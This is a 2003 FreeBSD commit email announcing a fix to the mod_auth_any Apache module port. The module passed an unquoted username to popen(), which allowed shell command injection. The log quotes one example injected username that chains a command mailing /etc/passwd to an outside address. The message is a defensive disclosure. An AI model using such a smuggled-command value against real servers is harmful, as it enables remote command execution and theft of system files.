From owner-cvs-all  Mon Mar 24 20:23:15 2003
Delivered-To: cvs-all@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP
	id E7E9937B401; Mon, 24 Mar 2003 20:23:11 -0800 (PST)
Received: from repoman.freebsd.org (repoman.freebsd.org [216.136.204.115])
	by mx1.FreeBSD.org (Postfix) with ESMTP
	id 8FA7243F75; Mon, 24 Mar 2003 20:23:11 -0800 (PST)
	(envelope-from lioux@FreeBSD.org)
Received: from repoman.freebsd.org (localhost [127.0.0.1])
	by repoman.freebsd.org (8.12.6/8.12.6) with ESMTP id h2P4NB0U096805;
	Mon, 24 Mar 2003 20:23:11 -0800 (PST)
	(envelope-from lioux@repoman.freebsd.org)
Received: (from lioux@localhost)
	by repoman.freebsd.org (8.12.6/8.12.6/Submit) id h2P4NBam096804;
	Mon, 24 Mar 2003 20:23:11 -0800 (PST)
Message-Id: <200303250423.h2P4NBam096804@repoman.freebsd.org>
From: Mario Sergio Fujikawa Ferreira <lioux@FreeBSD.org>
Date: Mon, 24 Mar 2003 20:23:11 -0800 (PST)
To: ports-committers@FreeBSD.org, cvs-ports@FreeBSD.org,
	cvs-all@FreeBSD.org
Subject: cvs commit: ports/www/mod_auth_any Makefile ports/www/mod_auth_any/files
         bash_single_quote_escape_string.c patch-mod_auth_any.c
X-FreeBSD-CVS-Branch: HEAD
X-Spam-Status: No, hits=0.0 required=5.0
	tests=none
	version=2.50
X-Spam-Level: 
X-Spam-Checker-Version: SpamAssassin 2.50 (1.173-2003-02-20-exp)
Sender: owner-cvs-all@FreeBSD.ORG
Precedence: bulk
List-ID: <cvs-all.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20cvs-all>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20cvs-all>
X-Loop: FreeBSD.ORG

lioux       2003/03/24 20:23:11 PST

  FreeBSD ports repository

  Modified files:
    www/mod_auth_any     Makefile 
  Added files:
    www/mod_auth_any/files bash_single_quote_escape_string.c 
                           patch-mod_auth_any.c 
  Log:
  o Fix vulnerability that allows execution of arbitrary commands on
    the server with the uid of the apache process. Background [1]:
  
  "The module accepts a username and password from the web client,
  passes them to a user-space executable (using popen(3), which invokes
  a shell) and waits for a response in order to authenticate the user.
  The password is quoted on the popen() command line to avoid
  interpretation of shell special chars, but the username is not.
  Thus a malicious user can execute commands by supplying an appropriately
  crafted username. (e.g. "foo&mail me@my.home</etc/passwd")
  
  "The problem is easily fixed by adding quotes (and escaping any
  quotes already present) to the username and password in the popen
  command line."
  
  o Fix this by adding a escaping function from [2]. Then, modifying
    this function appropriately with ideas from [3]. Apply the new
    escaping code to mod_auth_any.
  o Bump PORTREVISION
  
  Submitted by:   Security Officer (nectar),
                  Red Hat Security Response Team <security@redhat.com> [1]
  Obtained from:  mod_auth_any CVS [2],
                  nalin@redhat.com [3]
  
  Revision  Changes    Path
  1.6       +5 -0      ports/www/mod_auth_any/Makefile
  1.1       +45 -0     ports/www/mod_auth_any/files/bash_single_quote_escape_string.c (new)
  1.1       +37 -0     ports/www/mod_auth_any/files/patch-mod_auth_any.c (new)

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe cvs-all" in the body of the message